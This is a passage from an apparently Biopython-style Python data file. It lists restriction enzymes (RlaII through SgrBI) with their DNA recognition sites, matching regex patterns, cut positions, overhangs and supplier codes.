'suppl': (),
}
rest_dict['RlaII'] = _temp()
def _temp():
return {
'charac': (18, 9, None, None, 'CCCACA'),
'compsite': '(?=(?P<RleAI>CCCACA))|(?=(?P<RleAI_as>TGTGGG))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 18,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCACA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RleAI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGCYAC'),
'compsite': '(?=(?P<Rmu369III>GGC[CT]AC))|(?=(?P<Rmu369III_as>GT[AG]GCC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCYAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Rmu369III'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CGRGGAC'),
'compsite': '(?=(?P<RpaB5I>CG[AG]GGAC))|(?=(?P<RpaB5I_as>GTCC[CT]CG))',
'dna': None,
'freq': 8192.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRGGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RpaB5I'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CCCGCAG'),
'compsite': '(?=(?P<RpaBI>CCCGCAG))|(?=(?P<RpaBI_as>CTGCGGG))',
'dna': None,
'freq': 16384.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RpaBI'] = _temp()
def _temp():
return {
'charac': (18, 9, None, None, 'GTYGGAG'),
'compsite': '(?=(?P<RpaI>GT[CT]GGAG))|(?=(?P<RpaI_as>CTCC[AG]AC))',
'dna': None,
'freq': 8192.0,
'fst3': 9,
'fst5': 18,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTYGGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RpaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRTGGAG'),
'compsite': '(?=(?P<RpaTI>G[AG]TGGAG))|(?=(?P<RpaTI_as>CTCCA[CT]C))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRTGGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RpaTI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TCGCGA'),
'compsite': '(?=(?P<RruI>TCGCGA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGCGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['RruI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTAC'),
'compsite': '(?=(?P<RsaI>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'M', 'N', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['RsaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTAC'),
'compsite': '(?=(?P<RsaNI>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['RsaNI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CAYNNNNRTG'),
'compsite': '(?=(?P<RseI>CA[CT]....[AG]TG))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAYNNNNRTG',
'size': 10,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['RseI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACGCAG'),
'compsite': '(?=(?P<Rsp008IV>ACGCAG))|(?=(?P<Rsp008IV_as>CTGCGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Rsp008IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCCCAT'),
'compsite': '(?=(?P<Rsp008V>GCCCAT))|(?=(?P<Rsp008V_as>ATGGGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCCAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Rsp008V'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACACG'),
'compsite': '(?=(?P<Rsp531II>CACACG))|(?=(?P<Rsp531II_as>CGTGTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACACG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Rsp531II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTTCGAG'),
'compsite': '(?=(?P<RspPBTS2III>CTTCGAG))|(?=(?P<RspPBTS2III_as>CTCGAAG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTCGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['RspPBTS2III'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGGWCCG'),
'compsite': '(?=(?P<Rsr2I>CGG[AT]CCG))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGWCCG',
'size': 7,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Rsr2I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGGWCCG'),
'compsite': '(?=(?P<RsrII>CGG[AT]CCG))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGWCCG',
'size': 7,
'substrat': 'DNA',
'suppl': ('N', 'Q', 'X'),
}
rest_dict['RsrII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TGANNNNNNTGA'),
'compsite': '(?=(?P<Rtr1953I>TGA......TGA))|(?=(?P<Rtr1953I_as>TCA......TCA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGANNNNNNTGA',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Rtr1953I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAGCTC'),
'compsite': '(?=(?P<SacI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'AGCT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['SacI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CCGCGG'),
'compsite': '(?=(?P<SacII>CCGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'N', 'O', 'Q', 'R', 'X'),
}
rest_dict['SacII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAATNAG'),
'compsite': '(?=(?P<Saf8902III>CAAT.AG))|(?=(?P<Saf8902III_as>CT.ATTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAATNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Saf8902III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCAAAT'),
'compsite': '(?=(?P<Sag901I>GCAAAT))|(?=(?P<Sag901I_as>ATTTGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAAAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sag901I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTCGAC'),
'compsite': '(?=(?P<SalI>GTCGAC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCGAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['SalI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGGWCCC'),
'compsite': '(?=(?P<SanDI>GGG[AT]CCC))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGWCCC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SanDI'] = _temp()
def _temp():
return {
'charac': (8, 4, None, None, 'GCTCTTC'),
'compsite': '(?=(?P<SapI>GCTCTTC))|(?=(?P<SapI_as>GAAGAGC))',
'dna': None,
'freq': 16384.0,
'fst3': 4,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCTTC',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['SapI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TTAA'),
'compsite': '(?=(?P<SaqAI>TTAA))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTAA',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SaqAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<SatI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SatI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<Sau3AI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('C', 'J', 'K', 'M', 'N', 'R', 'X'),
}
rest_dict['Sau3AI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<Sau96I>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('J', 'N'),
}
rest_dict['Sau96I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGG'),
'compsite': '(?=(?P<SauI>CCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SauI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGNGAYG'),
'compsite': '(?=(?P<Sba460II>GG.GA[CT]G))|(?=(?P<Sba460II_as>C[AG]TC.CC))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNGAYG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sba460II'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CCTGCAGG'),
'compsite': '(?=(?P<SbfI>CCTGCAGG))',
'dna': None,
'freq': 65536.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTGCAGG',
'size': 8,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['SbfI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TGAAC'),
'compsite': '(?=(?P<Sbo46I>TGAAC))|(?=(?P<Sbo46I_as>GTTCA))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGAAC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sbo46I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGTACT'),
'compsite': '(?=(?P<ScaI>AGTACT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGTACT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['ScaI'] = _temp()
def _temp():
return {
'charac': (10, 5, None, None, 'GAGTC'),
'compsite': '(?=(?P<SchI>GAGTC))|(?=(?P<SchI_as>GACTC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SchI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CTCGAG'),
'compsite': '(?=(?P<SciI>CTCGAG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SciI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCTAAT'),
'compsite': '(?=(?P<ScoDS2II>GCTAAT))|(?=(?P<ScoDS2II_as>ATTAGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTAAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['ScoDS2II'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCNGG'),
'compsite': '(?=(?P<ScrFI>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('J', 'N'),
}
rest_dict['ScrFI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CCTGCAGG'),
'compsite': '(?=(?P<SdaI>CCTGCAGG))',
'dna': None,
'freq': 65536.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTGCAGG',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SdaI'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'CAGRAG'),
'compsite': '(?=(?P<SdeAI>CAG[AG]AG))|(?=(?P<SdeAI_as>CT[CT]CTG))',
'dna': None,
'freq': 2048.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SdeAI'] = _temp()
def _temp():
return {
'charac': (-11, -24, 23, 10, 'GACNNNNRTGA'),
'compsite': '(?=(?P<SdeOSI>GAC....[AG]TGA))|(?=(?P<SdeOSI_as>TCA[CT]....GTC))',
'dna': None,
'freq': 8192.0,
'fst3': -24,
'fst5': -11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 23,
'site': 'GACNNNNRTGA',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SdeOSI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GDGCHC'),
'compsite': '(?=(?P<SduI>G[AGT]GC[ACT]C))',
'dna': None,
'freq': 455.1111111111111,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'DGCH',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GDGCHC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SduI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCNNGG'),
'compsite': '(?=(?P<SecI>CC..GG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CNNG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SecI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CGCG'),
'compsite': '(?=(?P<SelI>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SelI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCAAAC'),
'compsite': '(?=(?P<Sen17963III>CCAAAC))|(?=(?P<Sen17963III_as>GTTTGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCAAAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sen17963III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GNGGCAG'),
'compsite': '(?=(?P<SenA1673III>G.GGCAG))|(?=(?P<SenA1673III_as>CTGCC.C))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GNGGCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SenA1673III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACRCAG'),
'compsite': '(?=(?P<SenSARA26III>AC[AG]CAG))|(?=(?P<SenSARA26III_as>CTG[CT]GT))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACRCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SenSARA26III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GATCAG'),
'compsite': '(?=(?P<SenTFIV>GATCAG))|(?=(?P<SenTFIV_as>CTGATC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SenTFIV'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'ASST'),
'compsite': '(?=(?P<SetI>A[CG][CG]T))',
'dna': None,
'freq': 64.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'ASST',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ASST',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['SetI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCWGGT'),
'compsite': '(?=(?P<SexAI>ACC[AT]GGT))',
'dna': None,
'freq': 8192.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCWGGT',
'size': 7,
'substrat': 'DNA',
'suppl': ('M', 'N'),
}
rest_dict['SexAI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCGATCGC'),
'compsite': '(?=(?P<SfaAI>GCGATCGC))',
'dna': None,
'freq': 65536.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGATCGC',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SfaAI'] = _temp()
def _temp():
return {
'charac': (10, 9, None, None, 'GCATC'),
'compsite': '(?=(?P<SfaNI>GCATC))|(?=(?P<SfaNI_as>GATGC))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['SfaNI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTRYAG'),
'compsite': '(?=(?P<SfcI>CT[AG][CT]AG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TRYA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRYAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['SfcI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTRYAG'),
'compsite': '(?=(?P<SfeI>CT[AG][CT]AG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TRYA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTRYAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SfeI'] = _temp()
def _temp():
return {
'charac': (8, -8, None, None, 'GGCCNNNNNGGCC'),
'compsite': '(?=(?P<SfiI>GGCC.....GGCC))',
'dna': None,
'freq': 65536.0,
'fst3': -8,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCCNNNNNGGCC',
'size': 13,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['SfiI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGCGCC'),
'compsite': '(?=(?P<SfoI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['SfoI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTCGAG'),
'compsite': '(?=(?P<Sfr274I>CTCGAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Sfr274I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CCGCGG'),
'compsite': '(?=(?P<Sfr303I>CCGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Sfr303I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<SfuI>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['SfuI'] = _temp()
def _temp():
return {
'charac': (13, 13, None, None, 'CNNG'),
'compsite': '(?=(?P<SgeI>C..G))',
'dna': None,
'freq': 16.0,
'fst3': 13,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CNNG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SgeI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCGATCGC'),
'compsite': '(?=(?P<SgfI>GCGATCGC))',
'dna': None,
'freq': 65536.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGATCGC',
'size': 8,
'substrat': 'DNA',
'suppl': ('R',),
}
rest_dict['SgfI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CRCCGGYG'),
'compsite': '(?=(?P<SgrAI>C[AG]CCGG[CT]G))',
'dna': None,
'freq': 16384.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRCCGGYG',
'size': 8,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['SgrAI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CCGCGG'),
'compsite': '(?=(?P<SgrBI>CCGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
